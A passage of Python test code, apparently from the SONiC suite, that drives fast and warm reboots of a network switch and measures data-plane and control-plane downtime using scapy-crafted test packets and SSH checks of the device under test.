for vlan, prefix in self.vlan_ip_range.items():
if not self.ports_per_vlan[vlan]:
continue
_, mask = prefix.split('/')
n_hosts = min(2**(32 - int(mask)) - 3, self.max_nr_vl_pkts)
for counter, i in enumerate(xrange(2, n_hosts + 2)):
mac = self.VLAN_BASE_MAC_PATTERN.format(counter)
port = self.ports_per_vlan[vlan][i % len(self.ports_per_vlan[vlan])]
addr = self.host_ip(prefix, i)
vlan_host_map[port][addr] = mac
for counter, i in enumerate(
xrange(n_hosts+2, n_hosts+2+len(self.ports_per_vlan[vlan])), start=n_hosts):
mac = self.VLAN_BASE_MAC_PATTERN.format(counter)
port = self.ports_per_vlan[vlan][i % len(self.ports_per_vlan[vlan])]
addr = self.host_ip(prefix, i)
self.vlan_host_ping_map[port][addr] = mac
self.nr_vl_pkts += n_hosts
return vlan_host_map
def generate_arp_responder_conf(self, vlan_host_map):
arp_responder_conf = {}
for port in vlan_host_map:
arp_responder_conf['eth{}'.format(port)] = {}
arp_responder_conf['eth{}'.format(port)].update(vlan_host_map[port])
arp_responder_conf['eth{}'.format(port)].update(self.vlan_host_ping_map[port])
return arp_responder_conf
def dump_arp_responder_config(self, dump):
# save data for arp_replay process
filename = "/tmp/from_t1.json" if self.logfile_suffix is None else "/tmp/from_t1_%s.json" % self.logfile_suffix
with open(filename, "w") as fp:
json.dump(dump, fp)
def get_peer_dev_info(self):
content = self.read_json('peer_dev_info')
for key in content.keys():
if 'ARISTA' in key:
self.vm_dut_map[key] = dict()
self.vm_dut_map[key]['mgmt_addr'] = content[key]['mgmt_addr']
# initialize all the port mapping
self.vm_dut_map[key]['dut_ports'] = []
self.vm_dut_map[key]['neigh_ports'] = []
self.vm_dut_map[key]['ptf_ports'] = []
def get_portchannel_info(self):
content = self.read_json('portchannel_ports_file')
for key in content.keys():
for member in content[key]['members']:
for vm_key in self.vm_dut_map.keys():
if member in self.vm_dut_map[vm_key]['dut_ports']:
self.vm_dut_map[vm_key]['dut_portchannel'] = str(key)
self.vm_dut_map[vm_key]['neigh_portchannel'] = 'Port-Channel1'
break
def get_neigh_port_info(self):
content = self.read_json('neigh_port_info')
for key in content.keys():
if content[key]['name'] in self.vm_dut_map.keys():
self.vm_dut_map[content[key]['name']]['dut_ports'].append(str(key))
self.vm_dut_map[content[key]['name']]['neigh_ports'].append(str(content[key]['port']))
self.vm_dut_map[content[key]['name']]['ptf_ports'].append(self.port_indices[key])
def build_peer_mapping(self):
'''
Builds a map of the form
'ARISTA01T1': {'mgmt_addr':
'neigh_portchannel'
'dut_portchannel'
'neigh_ports'
'dut_ports'
'ptf_ports'
}
'''
self.vm_dut_map = {}
for file in self.test_params['preboot_files'].split(','):
self.test_params[file] = '/tmp/' + file + '.json'
self.get_peer_dev_info()
self.get_neigh_port_info()
self.get_portchannel_info()
def build_vlan_if_port_mapping(self):
portchannel_content = self.read_json('portchannel_ports_file')
portchannel_names = [pc['name'] for pc in portchannel_content.values()]
vlan_content = self.read_json('vlan_ports_file')
vlan_if_port = []
for vlan in self.vlan_ip_range:
for ifname in vlan_content[vlan]['members']:
if ifname not in portchannel_names:
vlan_if_port.append((ifname, self.port_indices[ifname]))
return vlan_if_port
def populate_fail_info(self, fails):
for key in fails:
if key not in self.fails:
self.fails[key] = set()
self.fails[key] |= fails[key]
def get_sad_info(self):
'''
Prepares the msg string to log when a sad_oper is defined. Sad oper can be a preboot or inboot oper
sad_oper can be represented in the following ways
eg. 'preboot_oper' - a single VM will be selected and preboot_oper will be applied to it
'neigh_bgp_down:2' - 2 VMs will be selected and preboot_oper will be applied to the selected 2 VMs
'neigh_lag_member_down:3:1' - this case is used for lag member down operation only. This indicates that
3 VMs will be selected and 1 of the lag members in the porchannel will be brought down
'inboot_oper' - represents a routing change during warm boot (add or del of multiple routes)
'routing_add:10' - adding 10 routes during warm boot
'''
msg = ''
if self.sad_oper:
msg = 'Sad oper: %s ' % self.sad_oper
if ':' in self.sad_oper:
oper_list = self.sad_oper.split(':')
msg = 'Sad oper: %s ' % oper_list[0] # extract the sad oper_type
if len(oper_list) > 2:
# extract the number of VMs and the number of LAG members. sad_oper will be of the form oper:no of VMS:no of lag members
msg += 'Number of sad path VMs: %s Lag member down in a portchannel: %s' % (oper_list[-2], oper_list[-1])
else:
# inboot oper
if 'routing' in self.sad_oper:
msg += 'Number of ip addresses: %s' % oper_list[-1]
else:
# extract the number of VMs. preboot_oper will be of the form oper:no of VMS
msg += 'Number of sad path VMs: %s' % oper_list[-1]
return msg
def init_sad_oper(self):
if self.sad_oper:
self.log("Preboot/Inboot Operations:")
self.sad_handle = sp.SadTest(self.sad_oper, self.ssh_targets, self.portchannel_ports, self.vm_dut_map, self.test_params, self.vlan_ports, self.ports_per_vlan)
(self.ssh_targets, self.portchannel_ports, self.neigh_vm, self.vlan_ports, self.ports_per_vlan), (log_info, fails) = self.sad_handle.setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
if self.sad_oper:
log_info, fails = self.sad_handle.verify()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def do_inboot_oper(self):
'''
Add or del routes during boot
'''
if self.sad_oper and 'routing' in self.sad_oper:
self.log("Performing inboot operation")
log_info, fails = self.sad_handle.route_setup()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_inboot_sad_status(self):
if 'routing_add' in self.sad_oper:
self.log('Verify if new routes added during warm reboot are received')
else:
self.log('Verify that routes deleted during warm reboot are removed')
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=True)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def check_postboot_sad_status(self):
self.log("Postboot checks:")
log_info, fails = self.sad_handle.verify(pre_check=False, inboot=False)
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def sad_revert(self):
self.log("Revert to preboot state:")
log_info, fails = self.sad_handle.revert()
self.populate_fail_info(fails)
for log in log_info:
self.log(log)
self.log(" ")
def setUp(self):
self.fails['dut'] = set()
self.port_indices = self.read_port_indices()
self.vlan_ip_range = ast.literal_eval(self.test_params['vlan_ip_range'])
self.build_peer_mapping()
self.ports_per_vlan, self.portchannel_ports = self.read_vlan_portchannel_ports()
self.vlan_ports = []
for ports in self.ports_per_vlan.values():
self.vlan_ports += ports
if self.sad_oper:
self.test_params['vlan_if_port'] = self.build_vlan_if_port_mapping()
self.default_ip_range = self.test_params['default_ip_range']
self.limit = datetime.timedelta(seconds=self.test_params['reboot_limit_in_seconds'])
self.reboot_type = self.test_params['reboot_type']
if self.reboot_type in ['soft-reboot', 'reboot']:
raise ValueError('Not supported reboot_type %s' % self.reboot_type)
self.dut_mac = self.test_params['dut_mac']
if self.kvm_test:
self.log("This test is for KVM platform")
# get VM info
if isinstance(self.test_params['arista_vms'], list):
arista_vms = self.test_params['arista_vms']
else:
arista_vms = self.test_params['arista_vms'][1:-1].split(",")
self.ssh_targets = []
for vm in arista_vms:
if (vm.startswith("'") or vm.startswith('"')) and (vm.endswith("'") or vm.endswith('"')):
self.ssh_targets.append(vm[1:-1])
else:
self.ssh_targets.append(vm)
self.log("Converted addresses VMs: %s" % str(self.ssh_targets))
self.init_sad_oper()
self.vlan_host_map = self.generate_vlan_servers()
arp_responder_conf = self.generate_arp_responder_conf(self.vlan_host_map)
self.dump_arp_responder_config(arp_responder_conf)
self.random_vlan = random.choice(self.vlan_ports)
self.from_server_src_port = self.random_vlan
self.from_server_src_addr = random.choice(self.vlan_host_map[self.random_vlan].keys())
self.from_server_src_mac = self.hex_to_mac(self.vlan_host_map[self.random_vlan][self.from_server_src_addr])
self.from_server_dst_addr = self.random_ip(self.test_params['default_ip_range'])
self.from_server_dst_ports = self.portchannel_ports
self.log("Test params:")
self.log("DUT ssh: %s@%s" % (self.test_params['dut_username'], self.test_params['dut_hostname']))
self.log("DUT reboot limit in seconds: %s" % self.limit)
self.log("DUT mac address: %s" % self.dut_mac)
self.log("From server src addr: %s" % self.from_server_src_addr)
self.log("From server src port: %s" % self.from_server_src_port)
self.log("From server dst addr: %s" % self.from_server_dst_addr)
self.log("From server dst ports: %s" % self.from_server_dst_ports)
self.log("From upper layer number of packets: %d" % self.nr_vl_pkts)
self.log("VMs: %s" % str(self.test_params['arista_vms']))
self.log("Reboot type is %s" % self.reboot_type)
self.generate_from_t1()
self.generate_from_vlan()
self.generate_ping_dut_lo()
self.generate_arp_ping_packet()
if 'warm-reboot' in self.reboot_type:
self.log(self.get_sad_info())
# Pre-generate list of packets to be sent in send_in_background method.
generate_start = datetime.datetime.now()
if not self.vnet:
self.generate_bidirectional()
self.log("%d packets are ready after: %s" % (len(self.packets_list), str(datetime.datetime.now() - generate_start)))
self.dataplane = ptf.dataplane_instance
for p in self.dataplane.ports.values():
port = p.get_packet_source()
port.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.SOCKET_RECV_BUFFER_SIZE)
self.dataplane.flush()
if config["log_dir"] != None:
filename = os.path.join(config["log_dir"], str(self)) + ".pcap"
self.dataplane.start_pcap(filename)
self.log("Enabling arp_responder")
self.cmd(["supervisorctl", "restart", "arp_responder"])
return
def setup_fdb(self):
""" simulate traffic generated from servers to help populate FDB """
vlan_map = self.vlan_host_map
from_servers_pkt = testutils.simple_tcp_packet(
eth_dst=self.dut_mac,
ip_dst=self.from_server_dst_addr,
)
for port in vlan_map:
for addr in vlan_map[port]:
mac = vlan_map[port][addr]
from_servers_pkt[scapy.Ether].src = self.hex_to_mac(mac)
from_servers_pkt[scapy.IP].src = addr
testutils.send(self, port, from_servers_pkt)
# make sure orchagent processed new FDBs
time.sleep(1)
def tearDown(self):
self.log("Disabling arp_responder")
self.cmd(["supervisorctl", "stop", "arp_responder"])
# Stop watching DUT
self.watching = False
if config["log_dir"] != None:
self.dataplane.stop_pcap()
self.log_fp.close()
def get_if(self, iff, cmd):
s = socket.socket()
ifreq = ioctl(s, cmd, struct.pack("16s16x",iff))
s.close()
return ifreq
@staticmethod
def hex_to_mac(hex_mac):
return ':'.join(hex_mac[i:i+2] for i in range(0, len(hex_mac), 2))
def generate_from_t1(self):
self.from_t1 = []
# for each server host create a packet destinating server IP
for counter, host_port in enumerate(self.vlan_host_map):
src_addr = self.random_ip(self.default_ip_range)
src_port = self.random_port(self.portchannel_ports)
for server_ip in self.vlan_host_map[host_port]:
dst_addr = server_ip
# generate source MAC address for traffic based on LAG_BASE_MAC_PATTERN
mac_addr = self.hex_to_mac(self.LAG_BASE_MAC_PATTERN.format(counter))
packet = simple_tcp_packet(eth_src=mac_addr,
eth_dst=self.dut_mac,
ip_src=src_addr,
ip_dst=dst_addr,
ip_ttl=255,
tcp_dport=5000)
self.from_t1.append((src_port, str(packet)))
# expect any packet with dport 5000
exp_packet = simple_tcp_packet(
ip_src="0.0.0.0",
ip_dst="0.0.0.0",
tcp_dport=5000,
)
self.from_t1_exp_packet = Mask(exp_packet)
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "src")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "dst")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.TCP, "chksum")
self.from_t1_exp_packet.set_do_not_care_scapy(scapy.IP, "ttl")
def generate_from_vlan(self):
packet = simple_tcp_packet(
eth_dst=self.dut_mac,
eth_src=self.from_server_src_mac,
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
tcp_dport=5000
)
exp_packet = simple_tcp_packet(
ip_src=self.from_server_src_addr,
ip_dst=self.from_server_dst_addr,
ip_ttl=63,
tcp_dport=5000,
)
self.from_vlan_exp_packet = Mask(exp_packet)
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "src")
self.from_vlan_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.from_vlan_packet = str(packet)
def generate_ping_dut_lo(self):
self.ping_dut_packets = []
dut_lo_ipv4 = self.test_params['lo_prefix'].split('/')[0]
for src_port in self.vlan_host_ping_map:
src_addr = random.choice(self.vlan_host_ping_map[src_port].keys())
src_mac = self.hex_to_mac(self.vlan_host_ping_map[src_port][src_addr])
packet = simple_icmp_packet(eth_src=src_mac,
eth_dst=self.dut_mac,
ip_src=src_addr,
ip_dst=dut_lo_ipv4)
self.ping_dut_packets.append((src_port, str(packet)))
exp_packet = simple_icmp_packet(eth_src=self.dut_mac,
ip_src=dut_lo_ipv4,
icmp_type='echo-reply')
self.ping_dut_macjump_packet = simple_icmp_packet(eth_dst=self.dut_mac,
ip_src=self.from_server_src_addr,
ip_dst=dut_lo_ipv4)
self.ping_dut_exp_packet = Mask(exp_packet)
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.Ether, "dst")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "dst")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "id")
self.ping_dut_exp_packet.set_do_not_care_scapy(scapy.IP, "chksum")
def generate_arp_ping_packet(self):
vlan = next(k for k, v in self.ports_per_vlan.items() if v)
vlan_ip_range = self.vlan_ip_range[vlan]
vlan_port_canadiates = range(len(self.ports_per_vlan[vlan]))
vlan_port_canadiates.remove(0) # subnet prefix
vlan_port_canadiates.remove(1) # subnet IP on dut
src_idx = random.choice(vlan_port_canadiates)
vlan_port_canadiates.remove(src_idx)
dst_idx = random.choice(vlan_port_canadiates)
src_port = self.ports_per_vlan[vlan][src_idx]
dst_port = self.ports_per_vlan[vlan][dst_idx]
src_addr = self.host_ip(vlan_ip_range, src_idx)
dst_addr = self.host_ip(vlan_ip_range, dst_idx)
src_mac = self.hex_to_mac(self.vlan_host_map[src_port][src_addr])
packet = simple_arp_packet(eth_src=src_mac, arp_op=1, ip_snd=src_addr, ip_tgt=dst_addr, hw_snd=src_mac)
expect = simple_arp_packet(eth_dst=src_mac, arp_op=2, ip_snd=dst_addr, ip_tgt=src_addr, hw_tgt=src_mac)
self.log("ARP ping: src idx %d port %d mac %s addr %s" % (src_idx, src_port, src_mac, src_addr))
self.log("ARP ping: dst idx %d port %d addr %s" % (dst_idx, dst_port, dst_addr))
self.arp_ping = str(packet)
self.arp_resp = Mask(expect)
self.arp_resp.set_do_not_care_scapy(scapy.Ether, 'src')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwtype')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwsrc')
self.arp_src_port = src_port
def generate_bidirectional(self):
"""
This method is used to pre-generate packets to be sent in background thread.
Packets are composed into a list, and present a bidirectional flow as next:
five packet from T1, one packet from vlan.
Each packet has sequential TCP Payload - to be identified later.
"""
self.send_interval = self.time_to_listen / self.packets_to_send
self.packets_list = []
from_t1_iter = itertools.cycle(self.from_t1)
sent_count_vlan_to_t1 = 0
sent_count_t1_to_vlan = 0
for i in xrange(self.packets_to_send):
payload = '0' * 60 + str(i)
if (i % 5) == 0 : # From vlan to T1.
packet = scapyall.Ether(self.from_vlan_packet)
packet.load = payload
from_port = self.from_server_src_port
sent_count_vlan_to_t1 += 1
else: # From T1 to vlan.
src_port, packet = next(from_t1_iter)
packet = scapyall.Ether(packet)
packet.load = payload
from_port = src_port
sent_count_t1_to_vlan += 1
self.packets_list.append((from_port, str(packet)))
self.log("Sent prep count vlan to t1: {}".format(sent_count_vlan_to_t1))
self.log("Sent prep count t1 to vlan: {}".format(sent_count_t1_to_vlan))
def put_nowait(self, queue, data):
try:
queue.put_nowait(data)
except Queue.Full:
pass
def pre_reboot_test_setup(self):
self.reboot_start = None
self.no_routing_start = None
self.no_routing_stop = None
self.no_control_start = None
self.no_control_stop = None
self.no_cp_replies = None
self.upper_replies = []
self.routing_always = False
self.total_disrupt_packets = None
self.total_disrupt_time = None
self.ssh_jobs = []
self.lacp_session_pause = dict()
for addr in self.ssh_targets:
q = Queue.Queue(1)
self.lacp_session_pause[addr] = None
thr = threading.Thread(target=self.peer_state_check, kwargs={'ip': addr, 'queue': q})
thr.setDaemon(True)
self.ssh_jobs.append((thr, q))
thr.start()
if self.setup_fdb_before_test:
self.log("Run some server traffic to populate FDB table...")
self.setup_fdb()
self.log("Starting reachability state watch thread...")
self.watching = True
self.light_probe = False
self.watcher_is_stopped = threading.Event() # Waiter Event for the Watcher state is stopped.
self.watcher_is_running = threading.Event() # Waiter Event for the Watcher state is running.
self.watcher_is_stopped.set() # By default the Watcher is not running.
self.watcher_is_running.clear() # By default its required to wait for the Watcher started.
# Give watch thread some time to wind up
watcher = self.pool.apply_async(self.reachability_watcher)
time.sleep(5)
def get_warmboot_finalizer_state(self):
stdout, stderr, _ = self.dut_connection.execCommand('sudo systemctl is-active warmboot-finalizer.service')
if stderr:
self.fails['dut'].add("Error collecting Finalizer state. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
raise Exception("Error collecting Finalizer state. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
if not stdout:
self.log('Finalizer state not returned from DUT')
return ''
finalizer_state = stdout[0].strip()
return finalizer_state
def get_now_time(self):
stdout, stderr, _ = self.dut_connection.execCommand('date +"%Y-%m-%d %H:%M:%S"')
if stderr:
self.fails['dut'].add("Error collecting current date from DUT. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
raise Exception("Error collecting current date from DUT. stderr: {}, stdout:{}".format(str(stderr), str(stdout)))
if not stdout:
self.fails['dut'].add('Error collecting current date from DUT: empty value returned')
raise Exception('Error collecting current date from DUT: empty value returned')
return datetime.datetime.strptime(stdout[0].strip(), "%Y-%m-%d %H:%M:%S")
def check_warmboot_finalizer(self, finalizer_timeout):
self.wait_until_control_plane_up()
dut_datetime = self.get_now_time()
self.log('waiting for warmboot-finalizer service to become activating')
finalizer_state = self.get_warmboot_finalizer_state()
while finalizer_state != 'activating':
time.sleep(1)
dut_datetime_after_ssh = self.get_now_time()
time_passed = float(dut_datetime_after_ssh.strftime("%s")) - float(dut_datetime.strftime("%s"))
if time_passed > finalizer_timeout:
self.fails['dut'].add('warmboot-finalizer never reached state "activating"')
raise TimeoutError
finalizer_state = self.get_warmboot_finalizer_state()
self.log('waiting for warmboot-finalizer service to finish')
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
count = 0
while finalizer_state == 'activating':
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
time.sleep(10)
if count * 10 > int(self.test_params['warm_up_timeout_secs']):
self.fails['dut'].add('warmboot-finalizer.service did not finish')
raise TimeoutError
count += 1
self.log('warmboot-finalizer service finished')
def wait_until_control_plane_down(self):
self.log("Wait until Control plane is down")
self.timeout(self.wait_until_cpu_port_down, self.task_timeout, "DUT hasn't shutdown in {} seconds".format(self.task_timeout))
if self.reboot_type == 'fast-reboot':
self.light_probe = True
else:
# add or del routes during boot
self.do_inboot_oper()
self.reboot_start = datetime.datetime.now()
self.log("Dut reboots: reboot start %s" % str(self.reboot_start))
def wait_until_control_plane_up(self):
self.log("Wait until Control plane is up")
self.timeout(self.wait_until_cpu_port_up, self.task_timeout, "DUT hasn't come back up in {} seconds".format(self.task_timeout))
self.no_control_stop = datetime.datetime.now()
self.log("Dut reboots: control plane up at %s" % str(self.no_control_stop))
def handle_fast_reboot_health_check(self):
self.log("Check that device is still forwarding data plane traffic")
self.fails['dut'].add("Data plane has a forwarding problem after CPU went down")
self.check_alive()
self.fails['dut'].clear()
self.sniff_thr.join()
self.sender_thr.join()
# Stop watching DUT
self.watching = False
self.log("Stopping reachability state watch thread.")
self.watcher_is_stopped.wait(timeout = 10) # Wait for the Watcher stopped.
examine_start = datetime.datetime.now()
self.log("Packet flow examine started %s after the reboot" % str(examine_start - self.reboot_start))
self.examine_flow()
self.log("Packet flow examine finished after %s" % str(datetime.datetime.now() - examine_start))
if self.lost_packets:
self.no_routing_stop, self.no_routing_start = datetime.datetime.fromtimestamp(self.no_routing_stop), datetime.datetime.fromtimestamp(self.no_routing_start)
self.log("Dataplane disruption lasted %.3f seconds. %d packet(s) lost." % (self.max_disrupt_time, self.max_lost_id))
self.log("Total disruptions count is %d. All disruptions lasted %.3f seconds. Total %d packet(s) lost" % \
(self.disrupts_count, self.total_disrupt_time, self.total_disrupt_packets))
else:
self.no_routing_start = self.reboot_start
self.no_routing_stop = self.reboot_start
def handle_warm_reboot_health_check(self):
self.sniff_thr.join()
self.sender_thr.join()
# Stop watching DUT
self.watching = False
self.log("Stopping reachability state watch thread.")
self.watcher_is_stopped.wait(timeout = 10) # Wait for the Watcher stopped.
examine_start = datetime.datetime.now()
self.log("Packet flow examine started %s after the reboot" % str(examine_start - self.reboot_start))
self.examine_flow()
self.log("Packet flow examine finished after %s" % str(datetime.datetime.now() - examine_start))
if self.lost_packets:
self.no_routing_stop, self.no_routing_start = datetime.datetime.fromtimestamp(self.no_routing_stop), datetime.datetime.fromtimestamp(self.no_routing_start)
self.log("The longest disruption lasted %.3f seconds. %d packet(s) lost." % (self.max_disrupt_time, self.max_lost_id))
self.log("Total disruptions count is %d. All disruptions lasted %.3f seconds. Total %d packet(s) lost" % \
(self.disrupts_count, self.total_disrupt_time, self.total_disrupt_packets))
else:
self.no_routing_start = self.reboot_start
self.no_routing_stop = self.reboot_start
def handle_post_reboot_health_check(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
self.log('Waiting till SSH threads stop')
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
if self.total_disrupt_time > self.limit.total_seconds():
self.fails['dut'].add("Total downtime period must be less then %s seconds. It was %s" \
% (str(self.limit), str(self.total_disrupt_time)))
if 'warm-reboot' in self.reboot_type:
# after the data plane is up, check for routing changes
if self.test_params['inboot_oper'] and self.sad_handle:
self.check_inboot_sad_status()
# postboot check for all preboot operations
if self.test_params['preboot_oper'] and self.sad_handle:
self.check_postboot_sad_status()
else:
# verify there are no interface flaps after warm boot
self.neigh_lag_status_check()
def handle_advanced_reboot_health_check_kvm(self):
self.log("Wait until data plane stops")
forward_stop_signal = multiprocessing.Event()
async_forward_stop = self.pool.apply_async(self.check_forwarding_stop, args=(forward_stop_signal,))
self.log("Wait until control plane up")
port_up_signal = multiprocessing.Event()
async_cpu_up = self.pool.apply_async(self.wait_until_cpu_port_up, args=(port_up_signal,))
try:
self.no_routing_start, _ = async_forward_stop.get(timeout=self.task_timeout)
self.log("Data plane was stopped, Waiting until it's up. Stop time: %s" % str(self.no_routing_start))
except TimeoutError:
forward_stop_signal.set()
self.log("Data plane never stop")
try:
async_cpu_up.get(timeout=self.task_timeout)
no_control_stop = self.cpu_state.get_state_time('up')
self.log("Control plane down stops %s" % str(no_control_stop))
except TimeoutError as e:
port_up_signal.set()
self.log("DUT hasn't bootup in %d seconds" % self.task_timeout)
self.fails['dut'].add("DUT hasn't booted up in %d seconds" % self.task_timeout)
raise
# Wait until data plane up if it stopped
if self.no_routing_start is not None:
self.no_routing_stop, _ = self.timeout(self.check_forwarding_resume,
self.task_timeout,
"DUT hasn't started to work for %d seconds" % self.task_timeout)
else:
self.no_routing_stop = datetime.datetime.min
self.no_routing_start = datetime.datetime.min
# Stop watching DUT
self.watching = False
def handle_post_reboot_health_check_kvm(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
def handle_post_reboot_test_reports(self):
# Stop watching DUT
self.watching = False
# revert to pretest state
if self.sad_oper and self.sad_handle:
self.sad_revert()
if self.test_params['inboot_oper']:
self.check_postboot_sad_status()
self.log(" ")
# Generating report
self.log("="*50)
self.log("Report:")
self.log("="*50)
self.log("LACP/BGP were down for (extracted from cli):")
self.log("-"*50)
for ip in sorted(self.cli_info.keys()):
self.log(" %s - lacp: %7.3f (%d) po_events: (%d) bgp v4: %7.3f (%d) bgp v6: %7.3f (%d)" \
% (ip, self.cli_info[ip]['lacp'][1], self.cli_info[ip]['lacp'][0], \
self.cli_info[ip]['po'][1], \
self.cli_info[ip]['bgp_v4'][1], self.cli_info[ip]['bgp_v4'][0],\
self.cli_info[ip]['bgp_v6'][1], self.cli_info[ip]['bgp_v6'][0]))
self.log("-"*50)
self.log("Extracted from VM logs:")
self.log("-"*50)
for ip in sorted(self.logs_info.keys()):
self.log("Extracted log info from %s" % ip)
for msg in sorted(self.logs_info[ip].keys()):
if not msg in [ 'error', 'route_timeout' ]:
self.log(" %s : %d" % (msg, self.logs_info[ip][msg]))
else:
self.log(" %s" % self.logs_info[ip][msg])
self.log("-"*50)
self.log("Summary:")
self.log("-"*50)
if self.no_routing_stop:
self.log("Longest downtime period was %s" % str(self.no_routing_stop - self.no_routing_start))
reboot_time = "0:00:00" if self.routing_always else str(self.no_routing_stop - self.reboot_start)
self.log("Reboot time was %s" % reboot_time)
self.log("Expected downtime is less then %s" % self.limit)
if self.reboot_type == 'fast-reboot' and self.no_cp_replies:
self.log("How many packets were received back when control plane was down: %d Expected: %d" % (self.no_cp_replies, self.nr_vl_pkts))
has_info = any(len(info) > 0 for info in self.info.values())
if has_info:
self.log("-"*50)
self.log("Additional info:")
self.log("-"*50)
for name, info in self.info.items():
for entry in info:
self.log("INFO:%s:%s" % (name, entry))
self.log("-"*50)
is_good = all(len(fails) == 0 for fails in self.fails.values())
errors = ""
if not is_good:
self.log("-"*50)
self.log("Fails:")
self.log("-"*50)
errors = "\n\nSomething went wrong. Please check output below:\n\n"
for name, fails in self.fails.items():
for fail in fails:
self.log("FAILED:%s:%s" % (name, fail))
errors += "FAILED:%s:%s\n" % (name, fail)
self.log("="*50)
if self.no_routing_stop and self.no_routing_start:
dataplane_downtime = (self.no_routing_stop - self.no_routing_start).total_seconds()
else:
dataplane_downtime = ""
if self.total_disrupt_time:
# Add total downtime (calculated in physical warmboot test using packet disruptions)
dataplane_downtime = self.total_disrupt_time
dataplane_report = dict()
dataplane_report["downtime"] = str(dataplane_downtime)
dataplane_report["lost_packets"] = str(self.total_disrupt_packets) \
if self.total_disrupt_packets is not None else ""
controlplane_report = dict()
if self.no_control_stop and self.no_control_start:
controlplane_downtime = (self.no_control_stop - self.no_control_start).total_seconds()
else:
controlplane_downtime = ""
controlplane_report["downtime"] = str(controlplane_downtime)
controlplane_report["arp_ping"] = "" # TODO
controlplane_report["lacp_sessions"] = self.lacp_session_pause
self.report["dataplane"] = dataplane_report
self.report["controlplane"] = controlplane_report
with open(self.report_file_name, 'w') as reportfile:
json.dump(self.report, reportfile)
self.assertTrue(is_good, errors)
def runTest(self):
self.pre_reboot_test_setup()
try:
self.log("Check that device is alive and pinging")
self.fails['dut'].add("DUT is not ready for test")
self.wait_dut_to_warm_up()
self.fails['dut'].clear()
self.clear_dut_counters()
self.log("Schedule to reboot the remote switch in %s sec" % self.reboot_delay)
thr = threading.Thread(target=self.reboot_dut)
thr.setDaemon(True)
thr.start()
self.wait_until_control_plane_down()
self.no_control_start = self.cpu_state.get_state_time('down')
if 'warm-reboot' in self.reboot_type:
finalizer_timeout = 60 + self.test_params['reboot_limit_in_seconds']
thr = threading.Thread(target=self.check_warmboot_finalizer,\
kwargs={'finalizer_timeout': finalizer_timeout})
thr.setDaemon(True)
thr.start()
self.warmboot_finalizer_thread = thr
if self.kvm_test:
self.handle_advanced_reboot_health_check_kvm()
self.handle_post_reboot_health_check_kvm()
else:
if self.reboot_type == 'fast-reboot':
self.handle_fast_reboot_health_check()
if 'warm-reboot' in self.reboot_type:
self.handle_warm_reboot_health_check()
self.handle_post_reboot_health_check()
if 'warm-reboot' in self.reboot_type:
total_timeout = finalizer_timeout + self.test_params['warm_up_timeout_secs']
start_time = datetime.datetime.now()
# Wait until timeout happens OR the IO test completes
while ((datetime.datetime.now() - start_time).seconds < total_timeout) and\
self.warmboot_finalizer_thread.is_alive():
time.sleep(0.5)
if self.warmboot_finalizer_thread.is_alive():
self.fails['dut'].add("Warmboot Finalizer hasn't finished for {} seconds. Finalizer state: {}".format(total_timeout, self.get_warmboot_finalizer_state()))
# Check sonic version after reboot
self.check_sonic_version_after_reboot()
except Exception as e:
self.fails['dut'].add(e)
finally:
